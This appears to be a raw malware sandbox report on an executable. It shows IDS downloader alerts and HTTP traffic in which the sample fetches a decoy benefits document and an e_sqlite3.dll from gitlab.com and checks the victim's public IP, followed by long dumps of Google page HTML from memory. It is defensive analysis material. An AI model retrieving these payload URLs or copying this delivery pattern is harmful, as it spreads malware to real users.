      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49712 -> 142.250.185.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49718 -> 142.250.185.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49720 -> 142.250.185.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 142.250.185.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49714 -> 142.250.185.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49716 -> 142.250.185.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49722 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49709 -> 172.65.251.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49724 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49727 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49726 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49729 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49725 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49723 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49730 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49731 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49864 -> 172.65.251.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49886 -> 104.26.12.205:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49904 -> 104.26.12.205:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49884 -> 104.26.12.205:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49898 -> 104.26.12.205:443
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: &gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=g~{e_Nh! equals www.youtube.com (Youtube)
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB86C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 4-IFxleNtHQ'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria- equals www.youtube.com (Youtube)
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Hd=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms clascn equals www.youtube.com (Youtube)
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB86C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Xgb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='QTnOsumfQCWzwQe__WIe9g'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div c9 equals www.youtube.com (Youtube)
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB854000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: _ww.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='lRvzW2UsEppZS9-uclDMww'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.com/?hl=en&tab=wT">Translate</a></li><li class=gbmtc><a class=gbmt id=gb_17 href="http://www.google.com/mobile/?hl=en&tab=wD">Mobile</a></li><li class=gbmtc><a class=gbmt id=gb_10 equals www.youtube.com (Youtube)
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: r.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class1 equals www.youtube.com (Youtube)
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='3F9vy64wT1_qCaE6Rx_R_A'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='3F9vy64wT1_qCaE6Rx_R_A'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.com/?hl=en&tab=wT">Translate</a></li><li class=gbmtc><a class=gbmt id=gb_17 href="http://www.google.com/mobile/?hl=en&tab=wD">Mobile</a></li><li class=gbmtc><a class=gbmt id=gb_10 href="https://books.google.com/?hl=en&tab=wp">Books</a></li><li class=gbmtc><a class=gbmt id=gb_6 href="https://www.google.com/shopping?hl=en&source=og&tab=wf">Shopping</a></li><li class=gbmtc><a class=gbmt id=gb_30 href="https://www.blogger.com/?tab=wj">Blogger</a></li><li class=gbmtc><a class=gbmt id=gb_27 href="https://www.google.com/finance?tab=we">Finance</a></li><li class=gbmtc><a class=gbmt id=gb_31 href="https://photos.google.com/?tab=wq&pageId=none">Photos</a></li><li class=gbmtc><a class=gbmt id=gb_25 href="https://docs.google.com/document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.com/intl/en/about/products?tab=wh" class=gbmt>Even more &raquo;</a><script nonce='3F9vy64
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='4FLq4mKClGOpNu7OgieJnQ'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='4FLq4mKClGOpNu7OgieJnQ'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.com/?hl=en&tab=wT">Translate</a equals www.youtube.com (Youtube)
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC25D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='SWowg2FrEqZJ5bDrD4GCgA'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>D equals www.youtube.com (Youtube)
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='XzuwZpsD2ZR0AI_5cremPA'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></sn equals www.youtube.com (Youtube)
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC296000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='clKg_aC_uKcikfftopKvqA'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='clKg_aC_uKcikfftopKvqA'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.com/?hl=en&tab=wT">Translate</a></li><li class=gbmtc><a class=gbmt id=gb_17 href="http://www.google.com/mobile/?hl=en&tab=wD">Mobile</a></li><li class=gbmtc><a class=gbmt id=gb_10 href="https://books.google.com/?hl=en&tab=wp">Books</a></li><li class=gbmtc><a class=gbmt id=gb_6 href="https://www.google.com/shopping?hl=en&source=og&tab=wf">Shopping</a></li><li class=gbmtc><a class=gbmt id=gb_30 href="https://www.blogger.com/?tab=wj">Blogger</a></li><li class=gbmtc><a class=gbmt id=gb_27 href="https://www.google.com/finance?tab=we">Finance</a></li><li class=gbmtc><a class=gbmt id=gb_31 href="https://photos.google.com/?tab=wq&pageId=none">Photos</a></li><li class=gbmtc><a class=gb equals www.youtube.com (Youtube)
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='lRvzW2UsEppZS9-uclDMww'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='lRvzW2UsEppZS9-uclDMww'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.com/?hl=en&tab=wT">Translate</a equals www.youtube.com (Youtube)
